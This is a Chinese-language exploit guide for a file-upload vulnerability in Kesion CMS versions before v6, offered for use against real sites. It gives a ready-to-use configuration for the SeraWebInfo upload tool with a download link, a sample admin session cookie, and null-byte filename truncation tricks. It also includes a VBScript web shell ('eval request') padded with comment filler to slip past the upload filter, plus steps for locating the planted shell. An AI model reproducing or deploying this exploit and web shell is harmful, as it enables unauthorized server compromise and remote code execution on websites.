科讯Ksion CMS 通杀漏洞

通杀版本 :v6以前所有版本
漏洞文件 :user/UpFileSave.asp
通过自己构造参数AutoReName=3，可以将上传的文件名保存原样，通过截断可以直接得到SHELL
限制，后台禁止了注册，或者禁止了上传，或者把user目录删除了，优点是不用找后台
************************************************************************
先下载一个：SeraWebInfo  下载地址：http://www.unhex.net/upload/SeraWebInfo.rar
把下面文件保存为kesion.seraph
url=http://localhost/User/UpFileSave.asp?user_upfile.asp
login=
code=
login_postcontent=
filefield=File1
filefield2=
filename=1.cdxchr0.jpg
filename2=
local=kesion.txt
local2=
type=image/gif
type2=image/gif
cookies=ASPSESSIONIDAQRCDTRD=GGMHDJFBKDFCOLINMHICGBLC; KS6localhost=RndPassword=RL%5FXL%21QdIH5nIk1FvDz5&Password=469e80d32c0559f8&UserName=admin
name=BasicType&value=9999
name=AutoReName&value=3

1.加载配置

1.先找到注册一个帐号,登录,用
的方法抓取COOKIE
2.复制COOKIE到软件当中
3.上传文件名的地方可以自行改名,前面没关系,但后面一定要是.asachr0.jpg或者.cerchr0.jpg
4.本地SHELL文件必须用下面这个,KESION程序里面做了特殊的设置,别的东西是没办法上传上去的
<script language=VBScript runat=server>
eval request("#")
response.end
'11111111111111111111111111111111111111111111111111111111111111111111111111111111
'11111111111111111111111111111111111111111111111111111111111111111111111111111111
'1111111111111111111111111111111111111111111111111111111111111111111111111111111
'11111111111111111111111111111111111111111111111111111111111111111
'11111111111111111111111111111111111111111111111111111111111111111111111111111111
'1111111111111111111111111111111111111111111111111111111111111111111111111111111
'11111111111111111111111111111111111111111111111111111111111111111
'11111111111111111111111111111111111111111111111111111111111111111111111111111111
'1111111111111111111111111111111111111111111111111111111111111111111111111111111
'11111111111111111111111111111111111111111111111111111111111111111
'1111111111111111111111111111111111111111111111111111111111111111111111111111111
'11111111111111111111111111111111111111111111111111111111111111111
</script>
把上面这段保存成kesion.txt 第一个本地文件选择你保存的东西
4.注意你填写的URL地址,别是404还怪我配置文件错误哈,KESION不同版本上传路径稍有不同,请自己注意
5.也许你上传后没有执行权限,呵呵,告诉你一个小密秘,文件名那里是可以跳目录的,怎么跳?嘿嘿,就是不告诉你
上传后,自己看返回的信息找SHELL吧,